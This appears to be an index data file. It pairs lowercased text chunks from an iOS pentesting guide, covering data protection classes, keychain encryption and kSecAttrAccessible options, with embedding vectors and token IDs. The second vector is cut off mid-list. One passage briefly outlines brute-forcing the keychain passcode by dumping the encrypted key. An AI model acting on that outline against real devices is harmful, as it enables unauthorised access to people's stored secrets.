device. this protection class is used when, for example, a mail attachment is downloading in the background. protected until first user authentication ( nsfileprotectioncompleteuntilfirstuserauthentication ) : the file can be accessed as soon as the user unlocks the device for the first time after booting. it can be accessed even if the user subsequently locks the device and the class key is not removed from memory. no protection ( nsfileprotectionnone ) : the key for this protection class is protected with the uid only. the class key is stored in " effaceable storage ", which is a region of flash memory on the ios device that allows the storage of small amounts of data. this protection class exists for fast remote wiping ( immediate deletion of the class key, which makes the data inaccessible ). all class keys except nsfileprotectionnone are encrypted with a key derived from the device uid and the user's passcode. as a result, decryption can happen only on the device itself and requires the correct passcode. since ios 7, the default data protection class is " protected until first user authentication ". filedp is a program that you can upload and use inside the iphone to inspect the data protection class of each file. the keychaina keychain is an encrypted container where every application can store sensitive pieces of information and only the same app ( or authorised apps ) can retrieve the contents. the ios generated its own password for the keychain and stores an encrypted version of this key in the device. this password is encrypted with aes using an aes key created by a pbkdf2 function of the user's passcode + salt ( the 256 bit device uid only accessible to the secure enclave chipset on the device ). due to the use of this device uid as salt, a device won't be able to decrypt the keychain of a different device even knowing the users passcode. access to the keychain is managed by the securityd daemon, which grants access according to the app's keychain - access - groups, application - identifier, and application - group entitlements. the keychain api includes the following main operations : secitemaddsecitemupdatesecitemcopymatchingsecitemdeletethe only
[ -0.10525990277528763, -0.5637884736061096, 0.3413039445877075, 1.1128168106079102, -0.20181402564048767, -0.09284669905900955, -0.08825615793466568, 0.183260977268219, -0.171016126871109, 0.968654453754425, 0.11255670338869095, 0.21173086762428284, 0.3975410759449005, -0.048912860453128815, -0.9998623728752136, -0.7492966651916504, 0.009921561926603317, -0.02732480876147747, -0.28344523906707764, -0.17210327088832855, 0.49233901500701904, 0.04938744008541107, -0.5736320614814758, -1.3485023975372314, -0.26046881079673767, 0.6093282103538513, 0.6616413593292236, 0.16494446992874146, 0.2469715029001236, 1.0224099159240723, -0.1412353664636612, -0.23365800082683563, 0.1184832900762558, -0.6294501423835754, -0.2924467623233795, -0.30737724900245667, 0.8689467906951904, -0.3028489053249359, 0.14079073071479797, -0.727864146232605, 0.3635023534297943, 0.38314446806907654, 0.24011757969856262, -0.38053786754608154, -0.2602444589138031, -0.7768172025680542, 0.40096351504325867, 0.46379536390304565, -0.15431255102157593, -0.3364603817462921, 0.489112913608551, -0.18825015425682068, 0.2698656916618347, -0.07846684008836746, 0.3881535828113556, 0.43139177560806274, -0.08612047135829926, 0.026104845106601715, 0.008383200503885746, 0.5041307806968689, -0.22854632139205933, 0.059415895491838455, 0.37375879287719727, -0.537000298500061, 0.14714372158050537, 0.2450796514749527, -0.4336124062538147, -0.025728795677423477, -0.6237813830375671, -0.6466618776321411, 0.007316927425563335, 0.20416511595249176, -0.9183295965194702, -0.49667227268218994, -1.1530351638793945, -0.12026137858629227, 0.05156133696436882, 0.1481744349002838, 0.019399195909500122, 0.5129412412643433, -0.5397359728813171, 0.2589467167854309, 0.16619734466075897, -0.38072651624679565, -0.25360530614852905, -0.6877307891845703, 0.39763012528419495, -0.01442969311028719, -0.33336278796195984, -0.2391589879989624, -0.07240178436040878, 0.5392543077468872, -1.3643673658370972, -0.16306287050247192, 0.5579384565353394, 0.43474599719047546, -0.25668197870254517, -0.28078004717826843, 0.23829588294029236, -0.30228060483932495, 0.6032922863960266, 0.4070405960083008, 0.38439691066741943, 0.9595471620559692, 0.11121353507041931, 0.7056003212928772, 0.24210499227046967, 0.122878797352314, -0.3370097875595093, -0.6110928654670715, -0.07051796466112137, -0.7084774374961853, 0.17409943044185638, -0.7208709120750427, -0.34383535385131836, 0.26625317335128784, 0.6652370691299438, 0.5877595543861389, 0.261377215385437, 0.5084124803543091, 0.39890867471694946, 0.06580092012882233, 1.0274763107299805, -0.4364199936389923, 0.19576820731163025, 0.08696801215410233, 0.49115243554115295, 0.360658198595047, -0.4763231575489044, -0.3022436797618866, 0.16136084496974945, 0.10612311959266663, -0.0420493520796299, 0.46687036752700806, -0.7105581760406494, 0.06538930535316467, 0.9333155751228333, 0.10056083649396896, 0.7471706867218018, -0.7872781157493591, 0.01991179585456848, 0.6321815848350525, 0.08179982751607895, 0.5933148860931396, -0.3701653480529785, -0.5078152418136597, 0.015890033915638924, -0.4438634216785431, -0.8300652503967285, 0.10223178565502167, -0.03447893634438515, 0.6389425992965698, 0.4637862741947174, -0.013627775013446808, -0.5728846788406372, 0.026783790439367294, -0.5337928533554077, 0.42868390679359436, -0.24817132949829102, -0.12774379551410675, -0.5422473549842834, 0.5516546368598938, 0.5860149264335632, 0.4892655313014984, -0.23061811923980713, 0.014873791486024857, 0.017108889296650887, -0.4363637864589691, -0.01538146659731865, -0.30591800808906555, 0.5538631677627563, 0.01748679205775261, 0.05477644503116608, 0.20263302326202393, 0.9001469612121582, 0.12744209170341492, -0.1478281468153, -0.1302812248468399, 0.4957946836948395, 0.37724238634109497, 0.030676649883389473, 0.10431300103664398, 0.15051792562007904, 0.9568305015563965, -0.5587064623832703, 0.0898907333612442, -0.47049301862716675, -0.5226657390594482, -0.2641908526420593, 0.02803718112409115, -0.5865668058395386, 0.2828204929828644, -0.42213085293769836, 0.09414731711149216, 0.23624347150325775, 0.2517184317111969, -1.9108483791351318, -0.255736380815506, -0.1529581993818283, -0.6928885579109192, -0.09666775166988373, 0.34142208099365234, -0.25829264521598816, 0.4031624495983124, -0.317258358001709, -0.1469961404800415, 1.4160733222961426, 0.3735923767089844, -0.058644335716962814, 0.8183443546295166, 0.8272120952606201, -0.622454822063446, -0.3430716395378113, -0.26562947034835815, -0.13430458307266235, -0.5850010514259338, -0.12126625329256058, 0.5067440867424011, -0.47009095549583435, 0.4965303838253021, -0.5811984539031982, 0.6799687743186951, 0.2447679042816162, 0.04700648412108421, -0.2465479075908661, -0.054482799023389816, -0.002517162822186947, 0.19194915890693665, 0.10419707745313644, -0.00033339619403705, 0.019048109650611877, 0.7389947175979614, 0.6928030252456665, 1.2868481874465942, 0.13274893164634705, -0.14959530532360077, -0.37835779786109924, 0.19369854032993317, 0.3640822768211365, 0.07976843416690826, -0.346761018037796, 0.6122292280197144, 0.3620952367782593, 0.12052787840366364, 0.19694767892360687, -0.10923586785793304, -0.22557032108306885, 0.08732721209526062, 0.2978489398956299, 0.5271908640861511, -0.23469951748847961, 0.1056441068649292, 0.8465469479560852, -0.06545213609933853, -0.9202207922935486, 0.18931612372398376, 0.8796048760414124, 0.5333337783813477, -0.4949013888835907, -0.3893250524997711, 0.062401462346315384, 0.6600440144538879, -0.7696089744567871, -0.16668134927749634, 0.40611928701400757, 0.5818056464195251, 0.6383196115493774, 0.5862286686897278, -0.60175621509552, -0.6277781128883362, -1.3683416843414307, -0.40541818737983704, -0.8847549557685852, -0.12931349873542786, -0.5483036041259766, 0.25118446350097656, 0.15259943902492523, -0.3784138858318329, 0.8710859417915344, -0.9949564933776855, -0.5865974426269531, 0.2406139224767685, -0.13798773288726807, 0.40472888946533203, -0.18549904227256775, 0.3564842939376831, -0.5868768095970154, 0.22775200009346008, -0.16310997307300568, 0.34468287229537964, -0.4950612187385559, -0.24846717715263367, -0.6254196763038635, 0.08628533035516739, 0.15340684354305267, -0.6936646699905396, 0.6326035857200623, -0.15365110337734222, -0.2826603353023529, 0.09335292875766754, 0.27773019671440125, 0.14816905558109283, 0.5710490345954895, 0.21948474645614624, -0.7151458263397217, 0.21290886402130127, 0.25686657428741455, -0.3913028836250305, 1.1382123231887817, 0.610302209854126, -0.6475909948348999, 0.007885546423494816, 0.5510420799255371, 0.5418955087661743, -0.945879340171814, 0.8793995380401611, 0.5583890676498413, -0.06845442205667496, 0.12381772696971893, -0.01786142773926258, -0.01553491409868002, -0.014789329841732979, -0.6688217520713806, -0.1306740641593933, 0.0852176696062088, 0.3188432455062866, 0.08492299169301987, -0.7999265193939209, 0.22817623615264893, -0.4165843427181244, -0.8569156527519226, 0.16099342703819275, -0.7141342163085938, 0.33371973037719727, 0.3236342668533325, -0.020792022347450256, -0.2161787897348404, -0.8679897785186768, 0.5503567457199097, 0.5699529051780701, -0.1068514809012413, -0.4017753303050995, 0.5381191372871399, -0.017886457964777946, -0.05864451825618744, 0.35679587721824646, 0.2766039967536926, -0.36892345547676086, -0.7269346117973328, 0.034705162048339844, 0.26198601722717285, -0.14045588672161102, 0.6345901489257812, -0.10497082769870758, 0.8762837648391724, 0.5508350729942322, -0.20696884393692017, 0.17493030428886414, -0.08765998482704163, 0.38775452971458435, 0.6825664043426514, -0.007193561177700758, 0.23032470047473907, 0.032926104962825775, -0.12221633642911911, -1.1322284936904907, 0.10340986400842667, 0.27265289425849915, -0.13486063480377197, 0.09216928482055664, 0.4317569434642792, -0.15040510892868042, 0.27522170543670654, 0.916366696357727, -0.38110992312431335, -0.8272971510887146, 0.665763258934021, 0.1317461133003235, 0.43402522802352905, -0.22671692073345184, 0.2460552155971527, -0.4048324525356293, 0.179804727435112, 0.25093600153923035, 0.15768787264823914, -0.012180247344076633, -1.0153263807296753, -0.15012778341770172, -0.057806581258773804, -0.4920612871646881, 0.352560818195343, -0.36874300241470337, 0.5236284136772156, -0.0750386193394661, -0.8701119422912598, -0.46717458963394165, 0.15830621123313904, 0.7903276681900024, 0.2464768886566162, 0.2681933641433716, 1.2163547277450562, 1.061556100845337, -0.17218884825706482, 0.35711464285850525, -0.8286939859390259, 0.22480452060699463, -0.508580207824707, 0.8856210708618164, 0.12463560700416565, 0.09061694890260696, -0.6295387744903564, -0.45342081785202026, 0.0212654210627079, 0.04374486207962036, 0.20775780081748962, 0.48480913043022156, 0.04918607696890831, -0.2676238417625427, 0.5011574029922485, 0.12807275354862213, -0.8014310002326965, -0.6094061136245728, -0.4706197679042816, 0.32118695974349976, 1.096624732017517, -0.10254442691802979, 0.17670167982578278, -0.5531293153762817, 0.07926066219806671, 0.7950897812843323, -0.1909053474664688, -0.6215873956680298, -0.38041549921035767, -0.16632355749607086, -0.3604912757873535, -0.4115115702152252, 0.6951127648353577, 0.7520455718040466, 0.10667658597230911, -0.8053125143051147, 0.42616426944732666, 0.6390020847320557, -0.7636083960533142, -0.7447388768196106, 0.03460560739040375, 0.6882957816123962, 0.3592100441455841, 0.9428958296775818, 0.012751461938023567, -0.5333899855613708, 0.31440991163253784, -0.6934182643890381, 0.17690758407115936, 0.0998963788151741, -0.40799564123153687, 0.04929332435131073, -0.06764432787895203, -0.16198642551898956, 0.018959589302539825, -0.6773838996887207, -0.18834903836250305, 0.2254491150379181, 0.16318093240261078, 0.4616449177265167, -0.5319104194641113, 0.8701217770576477, -0.38983970880508423, -0.44261160492897034, 0.18595483899116516, 0.07926469296216965, -0.12284506112337112, -0.06394477933645248, -0.19884692132472992, -0.3490428924560547, 0.7830867171287537, -0.898298978805542, 0.3267016112804413, 0.05646926909685135, -0.46905744075775146, 0.20450906455516815, -0.4941856265068054, 1.225368857383728, -0.005588679574429989, 0.06393308937549591, -1.0226681232452393, -0.6272221207618713, -0.25560101866722107, -0.2570556402206421, -0.12198585271835327, 1.063021183013916, 0.0014906717697158456, -0.02584003657102585, -0.26785287261009216, 0.23590530455112457, -0.3914373517036438, 0.1317228376865387, -0.8323543071746826, -0.16402287781238556, -0.031017331406474113, 0.07968214899301529, 0.937100350856781, -0.2925916612148285, -0.8119962811470032, 0.6196305155754089, 0.1995096653699875, 0.28683435916900635, -0.9654480814933777, -0.605201244354248, -0.48367103934288025, 0.1690010279417038, -0.017188746482133865, 0.5279717445373535, -0.15353679656982422, 0.03074408881366253, 0.26449117064476013, 0.22196389734745026, 0.5418058633804321, -0.4629920423030853, 0.2452632188796997, 0.8354294896125793, 0.8556040525436401, -0.5173965692520142, 0.2558654546737671, 0.7307783961296082, -0.2286280393600464, 0.2442232370376587, -0.5648693442344666, -0.4782826900482178, -0.7184104919433594, -0.8240938186645508, 0.25873687863349915, -0.25151148438453674, 0.5296698212623596, -0.4738007187843323, -0.28182461857795715, -0.4118478298187256, 0.8091400265693665, -0.2880614101886749, -0.5685456395149231, 0.5915471315383911, -0.1258658617734909, 0.5156444311141968, 0.29199522733688354, -0.11332479119300842, -0.5304272174835205, -0.9124614596366882, -0.8479263186454773, 0.5014867782592773, 0.036712244153022766, 0.3257651925086975, 0.27542969584465027, -0.06749871373176575, 0.2905513644218445, 0.240695059299469, -0.7795641422271729, -0.6439836025238037, 0.1650734841823578, 0.05193677917122841, -0.5685811042785645, 0.027250776067376137, -1.3878674507141113, 0.7082058787345886, -0.07910209894180298, -0.2898983061313629, 0.29789337515830994, -0.31620118021965027, 0.2880006432533264, 0.22965382039546967, 0.32815441489219666, -0.8342145085334778, -0.012790289707481861, -0.8297554850578308, 0.2639206349849701, 0.18144215643405914, -0.04563441127538681, -1.0275928974151611, 0.5493596792221069, -0.6880807280540466, -1.5183565616607666, 0.42828601598739624, 0.10369580239057541, 0.015439139679074287, -0.02418436110019684, 0.042685214430093765, 0.5397633910179138, -0.47440779209136963, 0.6686965823173523, 0.5915565490722656, -0.11399675905704498, -0.11703400313854218, -0.003361314535140991, 0.9318848848342896, 0.2658434808254242, -0.4185316264629364, 0.0975760817527771, -0.2606982886791229, -0.601209819316864, 0.26231876015663147, -0.43842613697052, -0.21637976169586182, -0.9073172211647034, -0.13934603333473206, 0.4241538345813751, -0.20220598578453064, 0.8106364011764526, -0.36776039004325867, -0.22291775047779083, -0.16063450276851654, -0.08022157102823257, -0.5285510420799255, 0.36456307768821716, 0.6621858477592468, 0.06640676409006119, -0.42499566078186035, -0.43949487805366516, -0.6743720173835754, -0.3705593943595886, -0.37447598576545715, 1.033299207687378, -0.22992560267448425, -0.7282456159591675, 0.3784296214580536, 0.12604208290576935, -0.09802259504795074, -0.05281179025769234, -0.2265239953994751, -0.24082772433757782, 0.3797239065170288, -0.03249068185687065, 0.2288101464509964, 0.5544920563697815, 0.04221348837018013, -0.10944336652755737, 0.23271287977695465, 0.595583975315094, 0.8287060856819153, -0.5324848890304565, 0.9129287004470825, -0.07151661813259125, -0.37705498933792114, 0.44220542907714844, -0.89878910779953, -0.44538453221321106, -0.3955617845058441, 0.11011214554309845, 0.38478776812553406, -0.35849088430404663, 0.9323505163192749, -0.16272203624248505, -0.44756221771240234, -0.2362816333770752, -0.4068641662597656, 1.1385552883148193, -0.42338356375694275, 0.24262773990631104, 0.7759382128715515, 0.21182948350906372, -0.48131147027015686, 0.4365670680999756, 0.04552994668483734, -0.32160401344299316, -0.8227879405021667, -0.9045401215553284, -0.19063489139080048, 0.25902971625328064, 0.422360360622406, -0.372294545173645, -0.49582648277282715, -1.289807915687561, -0.6767790913581848, 0.1529662162065506, -0.21420125663280487, -0.14914579689502716, -0.4610811471939087, 0.31470057368278503, -0.32342329621315, -0.2454143762588501, 0.0735291987657547, 0.24813339114189148, -1.0055339336395264, 0.41955485939979553, -1.1501548290252686, -0.008388658054172993, -0.40827837586402893, -0.6500535011291504, -0.667611837387085, -0.4411991238594055, -0.14607714116573334, -0.5992576479911804, -0.115602046251297, 0.08639684319496155, -0.7784533500671387, 0.18162062764167786, -0.60638427734375, -0.19535019993782043, -0.5267331600189209, -0.7842444181442261, 0.4149736166000366, 0.4496075212955475, 0.29715391993522644, 0.1397845596075058, 0.7625842690467834, 0.1784690022468567, 0.2892066538333893, -0.6746417880058289, -0.055258478969335556, -0.06580670177936554, 0.5554831027984619, 0.29430997371673584, 0.7009599804878235, -0.6360707879066467, 0.17611064016819, -0.24621343612670898, -0.8974697589874268, 0.26473143696784973, -0.8251346945762634, 0.4543975293636322, 0.10884574055671692, -0.5515895485877991, -0.212541863322258, 0.14206154644489288, 0.25002098083496094, 0.6978699564933777, -0.35749611258506775, 0.18003620207309723, 0.668474555015564, -0.04159770533442497, 0.44090136885643005, -0.017396241426467896, 0.22708097100257874, -0.3455520570278168, -0.4318448603153229, -0.5951160192489624, -0.47070956230163574, 0.22989405691623688, -0.2940388321876526, -0.0448184460401535, -0.3965722322463989, 0.24554701149463654, 0.24495242536067963, 0.3470129370689392, 0.7158297300338745, 0.07049389183521271, -0.20402400195598602, 0.47367700934410095, -0.9020364880561829, -0.09593761712312698, -0.27932021021842957, -0.2563994824886322, 0.20751367509365082, 0.012558577582240105, -0.7513529658317566, -0.8872308731079102, -0.35345277190208435, -0.024992672726511955, 0.09784462302923203, 0.1729101836681366, 0.16781999170780182, 0.20495161414146423, -0.06911644339561462, 1.1208336353302002, -0.4905526041984558, 0.21908366680145264, -0.6996455788612366, 0.9371646046638489, -0.4873676896095276, -0.8371279239654541, 0.4275846779346466, 0.9407095313072205, 0.08979064971208572, -0.000350894988514483, -0.1220514178276062, 0.15146206319332123, 0.9529059529304504, 0.42374566197395325, 0.7043837904930115, -0.43303486704826355, -0.8911442160606384, 0.48472484946250916, -0.576154887676239, -0.05917612463235855, -0.44826140999794006, 0.28209489583969116, -0.10580528527498245, -0.2306942492723465, -1.0575737953186035, 0.4182620942592621, -0.32497504353523254, 0.169552743434906, 0.581726610660553, 0.8333981037139893, 0.3478127121925354, -0.872838020324707, -0.04827503859996796, -0.74808669090271, 0.15584443509578705, 0.3354927897453308, -0.10570240020751953, -0.12813347578048706, 0.1491880714893341, 0.5373754501342773, -0.10468582063913345, -0.6555029153823853, 0.6805175542831421, 0.3683021366596222, -0.5802318453788757, 0.5794547200202942, 0.19277800619602203, -0.29171058535575867, 0.32550105452537537, -0.4357788562774658, 0.3511129319667816, -0.3701375126838684, -0.07184140384197235, -0.5553670525550842, 0.0200455691665411, 0.7360053062438965, -0.7127736806869507, 0.497416228055954, 0.14165829122066498, -0.05775241553783417, 0.6308265328407288, -0.2501886487007141, -0.8177422285079956, 1.2723673582077026, 0.9976699352264404, 0.5175960659980774, 0.021008139476180077, 0.7590976357460022, 0.010144060477614403, 0.3322311043739319, -0.2637946307659149, 0.0358271449804306, -0.8536967039108276, 0.37778812646865845, 0.289480596780777, -0.8745235204696655, -0.7045551538467407, 0.0006628156988881528, 0.10446669906377792, -0.22213555872440338, 0.5451705455780029, -0.07901670038700104, 0.4437936246395111, -0.16947901248931885, 0.30344560742378235, -0.1382548213005066, 0.42487841844558716, 0.7765353918075562, -0.24437980353832245, -0.3982657790184021, 0.5595492124557495, -0.40687745809555054, 0.37224453687667847, 0.4635155200958252, 0.09797080606222153, 0.6571040749549866, 0.7294334173202515, 0.14018569886684418, -0.7045154571533203, -0.10550893843173981, -0.00559639185667038, -0.7536051273345947, -0.2864724397659302, 0.31637319922447205, 0.06797443330287933, -0.05962202697992325, -0.10270219296216965, 0.34011223912239075, -0.6043290495872498, 0.28733623027801514, 0.3289845585823059, -0.26941564679145813, 0.6244732141494751, 0.08871584385633469, -0.6520801186561584, -0.13497526943683624, -0.13078463077545166, 0.40324944257736206, 0.18096931278705597, -0.3396328389644623, -0.28408288955688477, -0.578150749206543, -0.6069640517234802, -0.2169194519519806, 1.068121314048767, -0.410488098859787, -0.23821154236793518, -0.15369881689548492, -1.3092560768127441, -0.4811328947544098, -0.07336633652448654, -0.10682407021522522, 0.005865458864718676, 0.6874099373817444, 0.7379535436630249, 0.5685769319534302, 0.46786999702453613, 0.015953117981553078, -0.06274805963039398, -0.016595428809523582, 0.8394505977630615, -0.537649929523468, 0.5331613421440125, 0.37093132734298706, 0.3051108419895172, 0.5798912048339844, -0.044909704476594925, 0.8204347491264343, -0.847570538520813, -0.32077449560165405, -0.6641912460327148, 0.18753357231616974, -0.2791810929775238, -0.0596199594438076, -0.13792216777801514, 0.051239803433418274, -0.3027587831020355, -0.006471945904195309, -0.7807074785232544, 0.06540984660387039, -0.8059351444244385, 0.32626304030418396, -0.0102035878226161, -0.014875977300107479, 0.3217484652996063, -0.009618938900530338, 0.452708899974823, -1.5145349502563477, 4.282576560974121, 0.7891227602958679, 0.2092777043581009, 0.14335082471370697, 0.24923133850097656, 0.6416813731193542, 0.885595440864563, -0.7349129915237427, -0.4313674569129944, -0.624605119228363, 0.583810031414032, -0.5376494526863098, 0.20529000461101532, -0.2219521850347519, 0.1903390735387802, 0.2552958130836487, -0.36757802963256836, 0.2837124168872833, 0.36033472418785095, -0.8570896983146667, -1.1924575567245483, -0.164455384016037, -0.8584643006324768, 1.109740138053894, 0.16355647146701813, -0.10217632353305817, 0.09601274877786636, -0.7293902635574341, -0.11968257278203964, 0.33410200476646423, -0.16155783832073212, -0.5907807350158691, 0.9092701077461243, -0.32870492339134216, -0.5984457731246948, 0.3707291781902313, 0.5392194390296936, -0.8028508424758911, -0.689135730266571, 0.1776495724916458, 0.0702359676361084, 0.3277648985385895, 0.6885449886322021, -1.0945199728012085, -0.3337041437625885, 0.6452885866165161, -0.6965224146842957, 0.5903845429420471, 1.2411491870880127, -0.35313495993614197, 0.9369763731956482, -0.23359766602516174, 0.459919273853302, -0.4197640120983124, -0.7440233826637268, 0.4696347415447235, 0.2099749892950058, -0.4913276731967926, 0.28267717361450195, -0.05183633416891098, 0.28944218158721924, -0.18111883103847504, 0.210165336728096, -0.6291691064834595, -0.7843371033668518, 0.1711738556623459, -0.03365376964211464, 0.7635918259620667, 0.26234060525894165, 0.020497217774391174, -0.0017025117995217443, -0.7661105394363403, -0.09728407114744186, -0.0817338228225708, 0.9925593137741089, -0.01835922710597515, -0.12227179110050201, 1.0789355039596558, 0.605419933795929, -0.8844677805900574, 0.13757680356502533, -0.7425885200500488, -1.218809723854065, -0.018527910113334656, 0.3056138753890991, 1.0970569849014282, 0.30081841349601746, -0.6159136295318604, -0.03924142196774483, 0.08069784194231033, 0.5235840678215027, 0.6717175841331482, -0.23600110411643982, 0.12405110150575638, 0.34960106015205383 ]
[ 5080, 1012, 2023, 3860, 2465, 2003, 2109, 2043, 1010, 2005, 2742, 1010, 1037, 5653, 14449, 2003, 8816, 2075, 1999, 1996, 4281, 1012, 5123, 2127, 2034, 5310, 27280, 1006, 24978, 8873, 2571, 21572, 26557, 3508, 9006, 10814, 2618, 16671, 4014, 8873, 12096, 20330, 4887, 10760, 16778, 10719, 1007, 1024, 1996, 5371, 2064, 2022, 11570, 2004, 2574, 2004, 1996, 5310, 19829, 2015, 1996, 5080, 2005, 1996, 2034, 2051, 2044, 9573, 2075, 1012, 2009, 2064, 2022, 11570, 2130, 2065, 1996, 5310, 3525, 11223, 1996, 5080, 1998, 1996, 2465, 3145, 2003, 2025, 3718, 2013, 3638, 1012, 2053, 3860, 1006, 24978, 8873, 2571, 21572, 26557, 3508, 8540, 2063, 1007, 1024, 1996, 3145, 2005, 2023, 3860, 2465, 2003, 5123, 2007, 1996, 21318, 2094, 2069, 1012, 1996, 2465, 3145, 2003, 8250, 1999, 1000, 1041, 20961, 21456, 3468, 5527, 1000, 1010, 2029, 2003, 1037, 2555, 1997, 5956, 3638, 2006, 1996, 16380, 5080, 2008, 4473, 1996, 5527, 1997, 2235, 8310, 1997, 2951, 1012, 2023, 3860, 2465, 6526, 2005, 3435, 6556, 14612, 1006, 6234, 3972, 20624, 2239, 1997, 1996, 2465, 3145, 1010, 2029, 3084, 1996, 2951, 29104, 1007, 1012, 2035, 2465, 6309, 3272, 24978, 8873, 2571, 21572, 26557, 3508, 8540, 2063, 2024, 4372, 26775, 22571, 3064, 2007, 1037, 3145, 5173, 2013, 1996, 5080, 21318, 2094, 1998, 1996, 5310, 1005, 1055, 3413, 16044, 1012, 2004, 1037, 2765, 1010, 11703, 2854, 16790, 2064, 4148, 2069, 2006, 1996, 5080, 2993, 1998, 5942, 1996, 6149, 3413, 16044, 1012, 2144, 16380, 1021, 1010, 1996, 12398, 2951, 3860, 2465, 2003, 1000, 5123, 2127, 2034, 5310, 27280, 1000, 1012, 6406, 2361, 2003, 1037, 2565, 2008, 2017, 2064, 2039, 11066, 1998, 2224, 2503, 1996, 18059, 2000, 22459, 1996, 2951, 3860, 2465, 1997, 2169, 5371, 1012, 1996, 3145, 24925, 2532, 3145, 24925, 2078, 2003, 2019, 4372, 26775, 22571, 3064, 11661, 2073, 2296, 4646, 2064, 3573, 7591, 4109, 1997, 2592, 1998, 2069, 1996, 2168, 10439, 1006, 2030, 19256, 18726, 1007, 2064, 12850, 1996, 8417, 1012, 1996, 16380, 7013, 2049, 2219, 20786, 2005, 1996, 3145, 24925, 2078, 1998, 5324, 2019, 4372, 26775, 22571, 3064, 2544, 1997, 2023, 3145, 1999, 1996, 5080, 1012, 2023, 20786, 2003, 4372, 26775, 22571, 3064, 2007, 29347, 2015, 2478, 2019, 29347, 2015, 3145, 2580, 2011, 1037, 1052, 2497, 2243, 20952, 2475, 3853, 1997, 1996, 5310, 1005, 1055, 3413, 16044, 1009, 5474, 1006, 1996, 17273, 2978, 5080, 21318, 2094, 2069, 7801, 2000, 1996, 5851, 25867, 11772, 3388, 2006, 1996, 5080, 1007, 1012, 2349, 2000, 1996, 2224, 1997, 2023, 5080, 21318, 2094, 2004, 5474, 1010, 1037, 5080, 2180, 1005, 1056, 2022, 2583, 2000, 11703, 2854, 13876, 1996, 3145, 24925, 2078, 1997, 1037, 2367, 5080, 2130, 4209, 1996, 5198, 3413, 16044, 1012, 3229, 2000, 1996, 3145, 24925, 2078, 2003, 3266, 2011, 1996, 3036, 2094, 12828, 1010, 2029, 8624, 3229, 2429, 2000, 1996, 10439, 1005, 1055, 3145, 24925, 2078, 1011, 3229, 1011, 2967, 1010, 4646, 1011, 8909, 4765, 18095, 1010, 1998, 4646, 1011, 2177, 4372, 3775, 24007, 2015, 1012, 1996, 3145, 24925, 2078, 17928, 2950, 1996, 2206, 2364, 3136, 1024, 10819, 4221, 25666, 5104, 8586, 4221, 12274, 17299, 8520, 8586, 4221, 12458, 7361, 24335, 4017, 8450, 3366, 17847, 26876, 12260, 22513, 5369, 2069 ]
hack_tricks
430.txt
1
ways to try to bf this password is dumping the encrypted key and bf the passcode + salt ( the pbkdf2 function uses at least 10000 iterations ). or trying to bf inside the device to avoids bfing the salt, however, secure enclave ensures there is at least a 5s delay between 2 failed password attempts. you can configure data protection for keychain items by setting the ksecattraccessible key in the call to secitemadd or secitemupdate. the following configurable accessibility values for ksecattraccessible are the keychain data protection classes : ksecattraccessiblealways : the data in the keychain item can always be accessed, regardless of whether the device is locked. ksecattraccessiblealwaysthisdeviceonly : the data in the keychain item can always be accessed, regardless of whether the device is locked. the data won't be included in an icloud or local backup. ksecattraccessibleafterfirstunlock : the data in the keychain item can't be accessed after a restart until the device has been unlocked once by the user. ksecattraccessibleafterfirstunlockthisdeviceonly : the data in the keychain item can't be accessed after a restart until the device has been unlocked once by the user. items with this attribute don't migrate to a new device. thus, after restoring from a backup of a different device, these items will not be present. ksecattraccessiblewhenunlocked : the data in the keychain item can be accessed only while the device is unlocked by the user. ksecattraccessiblewhenunlockedthisdeviceonly : the data in the keychain item can be accessed only while the device is unlocked by the user. the data won't be included in an icloud or local backup. ksecattraccessiblewhenpasscodesetthisdeviceonly : the data in the keychain can be accessed only when the device is unlocked. this protection class is only available if a passcode is set on the device. the data won't be included in an icloud or local backup. accesscontrolflags define the mechanisms with which users can authenticate the key ( secaccesscontrolcreateflags
[ 0.13241584599018097, -0.30215027928352356, 0.1693999320268631, 0.8009093403816223, -0.1528109312057495, -0.3259963095188141, 0.15518897771835327, 0.28646406531333923, 0.09526422619819641, 1.1808934211730957, 0.1525801122188568, 0.28913164138793945, 0.25601035356521606, -0.4389387369155884, -0.776758074760437, -0.06046804040670395, 0.19137847423553467, 0.0027635921724140644, -0.34748947620391846, -0.45750370621681213, 0.4910871386528015, -0.2261570543050766, -0.8877413868904114, -0.7730318903923035, -0.43526509404182434, 0.8021931052207947, 0.4537183344364166, 0.05318240448832512, 0.6942295432090759, 1.3426182270050049, 0.18981976807117462, -0.03958554565906525, 0.5786570310592651, -0.5812437534332275, 0.3400430381298065, -0.43054860830307007, 1.081905484199524, -0.24079757928848267, -0.1294487565755844, -0.449873685836792, -0.0451938733458519, 0.3069624900817871, -0.1670096218585968, -0.17365717887878418, -0.43729928135871887, -0.28847330808639526, -0.3394259512424469, 0.0783034935593605, 0.037603821605443954, -0.4609083831310272, 0.07805702090263367, 0.091912180185318, 0.5066021680831909, -0.07534036785364151, 0.2622368037700653, 0.18446728587150574, -0.006508486345410347, 0.12646350264549255, 0.21222525835037231, -0.022141018882393837, -0.134830042719841, -0.1269996166229248, 0.34610211849212646, -0.4273974299430847, 0.3415183126926422, -0.03700866550207138, -0.1360015869140625, -0.1711893081665039, -0.5930101871490479, -0.8295106887817383, -0.15598057210445404, 0.36361321806907654, 0.06510472297668457, -0.861409604549408, -0.7006324529647827, 0.013553280383348465, -0.04341329261660576, 0.16286201775074005, -0.5526339411735535, 0.8138990998268127, -0.10444972664117813, 0.4182816445827484, 0.9139999151229858, -0.6156491041183472, 0.05175849050283432, -0.32069504261016846, 0.1592283397912979, 0.6852831244468689, -0.23062072694301605, -0.4356151819229126, 0.1754823625087738, 0.35119280219078064, -0.8995661735534668, -0.33832624554634094, 0.1121426671743393, 0.27101051807403564, -0.22634346783161163, 0.13116131722927094, 0.18868803977966309, -0.04703735187649727, -0.09971268475055695, 0.9045200943946838, 0.2198430597782135, 1.1917279958724976, 0.17376792430877686, 0.8928691148757935, 0.5666871666908264, -0.3813568353652954, -0.4282423257827759, -0.5101054906845093, -0.2682747542858124, -0.29202860593795776, -0.013567245565354824, -0.9171662330627441, 0.04751618579030037, 0.15722090005874634, 0.8729491233825684, 0.5107102394104004, 0.019037017598748207, 0.3891812264919281, 0.3944304287433624, 0.12638862431049347, 1.0140221118927002, -0.3196248412132263, -0.07745502889156342, 0.13414537906646729, 0.9714414477348328, -0.3485787510871887, -0.22731392085552216, -0.04305867850780487, -0.32847321033477783, 0.08418979495763779, 0.11145216971635818, 0.40085431933403015, -0.8794235587120056, -0.13262467086315155, 0.36732596158981323, -0.005867964122444391, 0.49528399109840393, 0.2928959131240845, 0.2252252995967865, 0.3553581237792969, 0.22199606895446777, 0.7407556772232056, 